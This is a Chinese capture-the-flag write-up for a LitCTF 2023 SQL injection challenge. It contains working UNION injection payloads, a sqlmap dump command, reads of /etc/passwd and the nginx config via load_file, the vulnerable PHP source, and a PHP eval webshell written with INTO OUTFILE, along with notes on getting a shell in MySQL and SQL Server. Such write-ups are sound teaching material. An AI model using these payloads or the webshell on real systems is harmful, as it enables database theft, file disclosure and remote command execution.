0%

[LitCTF 2023]这是什么?SQL !注一下 ! clqwsn的WriteUp

2023-05-14 12:14By
clqwsn
文件上传

1、查询所有库

?id=-1)))))) union select schema_name,2 from information_schema.schemata%23
Array ( [0] => Array ( [username] => information_schema [password] => 2 )
 [1] => Array ( [username] => mysql [password] => 2 ) 
 [2] => Array ( [username] => ctftraining [password] => 2 )
 [3] => Array ( [username] => performance_schema [password] => 2 )
 [4] => Array ( [username] => test [password] => 2 )
 [5] => Array ( [username] => ctf [password] => 2 ) )

2、查询ctf库

?id=-1)))))) union select database(),2%23
Array ( [0] => Array ( [username] => ctf [password] => 2 ) )


?id=-1)))))) union select group_concat(table_name),2 from information_schema.tables where table_schema='ctf'%23
//users


?id=-1)))))) union select group_concat(column_name),2 from information_schema.columns where table_name='users' and table_schema='ctf'%23
// id,username,password


?id=-1)))))) union select group_concat(id,0x7e,username,0x7e,password),2 from users%23
//1~tanji~OHHHHHHH,2~fake_flag~F1rst_to_Th3_eggggggggg!}
//假的flag

3、查询ctftraing库

?id=-1)))))) union select group_concat(table_name),2 from information_schema.tables where table_schema='ctftraining'%23
Array ( [0] => Array ( [username] => flag,news,users [password] => 2 ) )
// flag,news,users 


?id=-1)))))) union select group_concat(column_name),2 from information_schema.columns where table_name='flag' and ='ctftraining'%23
Array ( [0] => Array ( [username] => flag [password] => 2 ) )
//flag 


?id=-1)))))) union select group_concat(column_name),2 from information_schema.columns where table_name='news' and table_schema='ctftraining'%23
//id,title,content,time


?id=-1)))))) union select group_concat(column_name),2 from information_schema.columns where table_name='users' and table_schema='ctftraining'%23
//id,username,password,ip,time


?id=-1)))))) union select group_concat(id,0x7e,title,0x7e,content,0x7e,time),2 from news where table_schema='ctftraining'%23
//0 results


?id=-1)))))) union select group_concat(id,0x7e,username,0x7e,password,0x7e,ip),2 from users where table_schema='ctftraining'%23
//0 results


?id=-1)))))) union select flag,2 from flag where table_schema='ctftraining'%23
//0 results


怎么会是空的呢????
可能是语句的问题,我们使用Sqlmap直接跑:
sqlmap -u http://node5.anna.nssctf.cn:28051/index.php?id=1 -D "ctftraining" -T flag -C flag --dump
//NSSCTF{b029dc6f-0160-4b1e-b2c1-4aeb301dc3e2}

经过测试,发现了table_schema只是内置库的字段,我们这里指定数据库查询应该用:库名.表名的形式
?id=-1)))))) union select flag,2 from ctftraining.flag%23
// NSSCTF{d999de63-d796-4151-b10e-c77cbc87ab64}

4、寻找彩蛋:

之前查到的假的flag,好像是最后一个彩蛋:
F1rst_to_Th3_eggggggggg!}

5、getshell:

MySQL GETSHELL条件和原理:

条件:
 root权限
 知道网站根目录绝对路径
 secure_file_priv为空或指定目录(@@secure_file_priv参数可以其值)
 gpc关闭
原理:
 写入webshell,通过参数执行系统命令,结束后删除webshell


附:sqlserver getshell条件和原理
 条件:
  支持外连
  有sa权限
 原理:
  开启xp_cmd扩展执行系统命令

读写文件:

?id=-1)))))) union select load_file('/etc/passwd'),2%23
root:x:0:0:root:/root:/bin/ash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/mail:/sbin/nologin
news:x:9:13:news:/usr/lib/news:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucppublic:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
man:x:13:15:man:/usr/man:/sbin/nologin
postmaster:x:14:12:postmaster:/var/mail:/sbin/nologin
cron:x:16:16:cron:/var/spool/cron:/sbin/nologin
ftp:x:21:21::/var/lib/ftp:/sbin/nologin
sshd:x:22:22:sshd:/dev/null:/sbin/nologin
at:x:25:25:at:/var/spool/cron/atjobs:/sbin/nologin
squid:x:31:31:Squid:/var/cache/squid:/sbin/nologin
xfs:x:33:33:X Font Server:/etc/X11/fs:/sbin/nologin
games:x:35:35:games:/usr/games:/sbin/nologin
cyrus:x:85:12::/usr/cyrus:/sbin/nologin
vpopmail:x:89:89::/var/vpopmail:/sbin/nologin
ntp:x:123:123:NTP:/var/empty:/sbin/nologin
smmsp:x:209:209:smmsp:/var/spool/mqueue:/sbin/nologin
guest:x:405:100:guest:/dev/null:/sbin/nologin
nobody:x:65534:65534:nobody:/:/sbin/nologin
www-data:x:82:82:Linux User,,,:/home/www-data:/sbin/nologin
mysql:x:100:101:mysql:/var/lib/mysql:/sbin/nologin
nginx:x:101:102:nginx:/var/lib/nginx:/sbin/nologin

读取nginx配置文件,寻找网站根目录

?id=-1)))))) union select load_file('/etc/nginx/nginx.conf'),2%23
Array ( [0] => Array ( [username] => daemon off; worker_processes auto; error_log /var/log/nginx/error.log warn; events { worker_connections 1024; } http { include /etc/nginx/mime.types; default_type application/octet-stream; sendfile on; keepalive_timeout 65; server { listen 80; server_name localhost; root /var/www/html; index index.php; proxy_set_header Host $host; proxy_set_header X-Real-IP $remote_addr; proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for; location / { try_files $uri $uri/ /index.php?$args; } location ~ \.php$ { try_files $uri =404; fastcgi_pass 127.0.0.1:9000; fastcgi_index index.php; include fastcgi_params; fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name; } } } [password] => 2 ) )

读取首页:

?id=-1)))))) union select load_file('/var/www/html/index.php'),2%23
Array
(
    [0] => Array
        (
            [username] => <?php
    error_reporting(0);
  include "connect.php";
?>
<!DOCTYPE html>
<html>

<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, shrink-to-fit=no">
    <title>狠狠的注入涅~</title>
    <link rel="stylesheet" href="assets/bootstrap/css/bootstrap.min.css">
    <link rel="stylesheet"
        href="https://fonts.googleapis.com/css?family=Lato:300,400,700,300italic,400italic,700italic&amp;display=swap">
</head>

<body>
    <header class="text-center text-white masthead"
        style="background:url('https://www.dmoe.cc/random.php')no-repeat center center;background-size:cover;">
        <div class="overlay"></div>
        <div class="container">
            <div class="row">
                <div class="col-xl-9 mx-auto position-relative">
                    <h1 class="mb-5">Search what you want to search</h1>
                </div>
                <div class="col-md-10 col-lg-8 col-xl-7 mx-auto position-relative">
                    <form method="get" action="">
                        <div class="row">
                            <div class="col-12 col-md-9 mb-2 mb-md-0">
                                <input class="form-control form-control-lg" type="text" name="id"
                                    placeholder="Enter your id to start">
                            </div>
                            <div class="col-12 col-md-3">
                                <button class="btn btn-primary btn-lg" type="submit">姨妈大!</button>
                            </div>
                        </div>
                    </form>

                </div>
            </div>
        </div>
    </header>
    


<section class="text-center bg-light features-icons">
    <div class="container">
        <div class="row">
            <div class="col-md-6"> 
                <h5>Key Source</h5>
                <pre><?php highlight_file(source) ?></pre>
            </div>
            <div class="col-md-6"> 
                <?php
                
                $sql = "SELECT username,password FROM users WHERE id = ".'(((((('.$_GET["id"].'))))))';
                echo "<h5>Executed Operations:</h5>"
                    .$sql
                    ."<br><br>";
                $result = $conn->query($sql);
                if ($result->num_rows > 0) {
                        print_r(mysqli_fetch_all($result, MYSQLI_ASSOC));
                } else {
                    echo "0 results";
                }
                ?>
            </div>
        </div>
    </div>
</section>



    <section class="showcase">
        <div class="container-fluid p-0">
            <div class="row g-0"></div>
        </div>
    </section>
    <script src="assets/bootstrap/js/bootstrap.min.js"></script>
</body>

</html>



            [password] => 2
        )

)

写入php探针:

?id=-1)))))) union select '<?php phpinfo();?>',2 into outfile '/var/www/html/info.php'%23
http://node6.anna.nssctf.cn:28413/info.php

访问测试:http://node6.anna.nssctf.cn:28413/info.php

写入webshell:

?id=-1)))))) union select '<?php eval($_POST["cc"]);?>',2 into outfile '/var/www/html/cc.php'%23

蚁剑连接:http://node6.anna.nssctf.cn:28413/cc.php 密码cc

还没有人赞赏,快来当第一个赞赏的人吧!
  
© 著作权归作者所有

加载中...

加载失败
广告
×
评论区
添加新评论

flag要这样查:1)))))) union select flag,2 from ctftraining.flag #

看错了

马子穿上了。连不上数据库

为什么俺传马穿不上嘞?

穿上了

wow 很详细捏~